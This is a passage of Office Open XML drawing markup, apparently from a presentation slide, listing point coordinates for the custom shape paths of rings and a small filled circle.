                  <a:lnTo>
                    <a:pt x="715810" y="3162300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752346" y="3187700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789571" y="3213100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="827471" y="3238500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866027" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905223" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985470" y="3327400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1026488" y="3340100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068079" y="3365500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196132" y="3403600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239854" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284067" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215036" y="3441700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2259249" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2302971" y="3403600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2431024" y="3365500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472615" y="3340100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513633" y="3327400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654148" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607011" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560278" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513971" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468111" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246269" y="3200400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161412" y="3175000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119899" y="3149600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079027" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038815" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999286" y="3086100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960460" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922360" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885006" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848420" y="2997200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812623" y="2971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777637" y="2946400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743482" y="2908300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710181" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677754" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646224" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615611" y="2794000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585937" y="2755900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557223" y="2717800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529490" y="2679700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502760" y="2654300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477055" y="2616200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452395" y="2578100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428802" y="2540000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406298" y="2501900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384903" y="2463800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364639" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345528" y="2374900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327590" y="2336800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310848" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295323" y="2247900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281035" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268007" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256259" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245813" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236691" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228914" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217479" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213864" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211679" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210947" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211679" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213864" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217479" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228914" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236691" y="1473200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245813" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256259" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268007" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281035" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295323" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310848" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327590" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345528" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364639" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384903" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406298" y="1003300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428802" y="965200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452395" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477055" y="889000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502760" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529490" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557223" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585937" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615611" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646224" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677754" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710181" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743482" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777637" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812623" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848420" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885006" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922360" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960460" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999286" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038815" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079027" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119899" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161412" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1203542" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422720" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468111" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560278" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701669" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749552" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2554060" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513633" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472615" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2431024" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388875" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125204" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079618" y="25400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1749552" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1797434" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938825" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030992" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2076383" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295561" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2337691" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379204" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420076" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2460288" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499817" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538643" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576743" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614097" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650683" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686480" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721466" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755621" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788922" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821349" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852879" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883492" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913166" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941880" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2969613" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996343" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022048" y="889000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3046708" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070301" y="965200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092805" y="1003300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114200" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134464" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3153575" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3171513" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188255" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3203780" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3218068" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3231096" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242844" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253290" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3262412" y="1473200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270189" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3276600" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281624" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3285239" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287424" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288156" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287424" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3285239" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281624" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3276600" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270189" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3262412" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253290" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242844" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3231096" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3218068" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3203780" y="2247900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188255" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3171513" y="2336800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3153575" y="2374900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134464" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114200" y="2463800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092805" y="2501900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070301" y="2540000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3046708" y="2578100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022048" y="2616200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996343" y="2654300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2969613" y="2679700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941880" y="2717800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913166" y="2755900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883492" y="2794000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852879" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821349" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788922" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755621" y="2908300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721466" y="2946400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686480" y="2971800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650683" y="2997200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614097" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576743" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538643" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499817" y="3086100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2460288" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420076" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379204" y="3149600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2337691" y="3175000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2252834" y="3200400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030992" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985132" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938825" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1892092" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1844955" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593880" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2633076" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2671632" y="3238500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709532" y="3213100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746757" y="3187700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783293" y="3162300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819122" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854228" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2888594" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2922203" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955040" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987087" y="2984500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018328" y="2959100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048746" y="2921000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078325" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107048" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134899" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3161861" y="2781300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187917" y="2743200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213050" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3237245" y="2667000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260485" y="2628900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3282752" y="2590800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3304031" y="2552700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324305" y="2514600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343557" y="2476500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3361771" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378930" y="2387600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395017" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3410017" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423911" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3436685" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448320" y="2171700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3458802" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468112" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3476235" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483153" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3488851" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493312" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496518" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498454" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3499104" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498454" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496518" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493312" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3488851" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483153" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3476235" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468112" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3458802" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448320" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3436685" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423911" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3410017" y="1193800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395017" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378930" y="1104900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3361771" y="1066800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343557" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324305" y="977900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3304031" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3282752" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260485" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3237245" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213050" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187917" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3161861" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134899" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107048" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078325" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048746" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018328" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987087" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955040" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2922203" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2888594" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854228" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819122" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783293" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746757" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709532" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2671632" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2633076" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593880" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1987188" y="12700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1511915" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465496" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033607" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987188" y="12700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1893192" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1605911" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558725" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940378" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893192" y="0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787929" y="3939506"/>
              <a:ext cx="381000" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="381000" h="379729">
                  <a:moveTo>
                    <a:pt x="211442" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="169490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128347" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89630" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54957" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27478" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9159" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9159" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27478" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54957" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89630" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128347" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169490" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211442" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252584" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291301" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325975" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353453" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371773" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380932" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380932" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371773" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353453" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325975" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291301" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252584" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211442" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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787921" y="3939514"/>
              <a:ext cx="2710180" cy="2710180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
